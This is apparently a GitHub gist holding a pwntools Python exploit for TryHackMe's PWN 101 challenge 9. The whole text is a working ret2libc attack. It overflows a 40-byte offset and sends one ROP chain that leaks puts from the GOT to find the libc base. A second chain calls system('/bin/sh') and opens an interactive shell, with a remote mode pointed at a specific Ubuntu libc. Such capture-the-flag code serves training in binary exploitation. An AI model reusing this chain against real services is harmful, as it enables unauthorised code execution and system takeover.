THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)

gistfile1.txt

#!/bin/env python3

import sys
from pwn import *

exe = "./pwn109.pwn109"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)


# Specific your GDB script here for debugging
gdbscript = '''
continue
'''.format(**locals())

offset = 32 + 8 # Adjust for buffer + RBP

log.info( "Starting exploit run..." )
p = start()

log.info( "Building ROP chain to calc libc addr..." )
rop = ROP(elf)
rop.call(rop.ret)       # Stack align with extra 'ret' to deal with movaps issue
rop.puts(elf.got.puts)
rop.call(elf.sym.main)

log.info( "Sending payload..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
p.recvline()
puts_str = p.recvline()
puts_addr = u64(puts_str.strip().ljust(8, b"\x00"))

log.info( "Puts is at %#x", puts_addr )

if args.REMOTE:
    libc = ELF("libc6_2.27-3ubuntu1.4_amd64.so", checksec=False)
else:
    libc = ELF("libc.so.6", checksec=False)

libc.address = puts_addr - libc.sym.puts
log.info( "libc base is at %#x", libc.address )

log.info( "Building ROP chain to exec shell..." )
rop = ROP(libc)
rop.call(rop.ret)     # Stack align with extra 'ret' to deal with movaps issue
rop.system(next(libc.search(b'/bin/sh')), 0, 0)

log.info( "Sending payload to get shell..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )

p.clean()
p.interactive()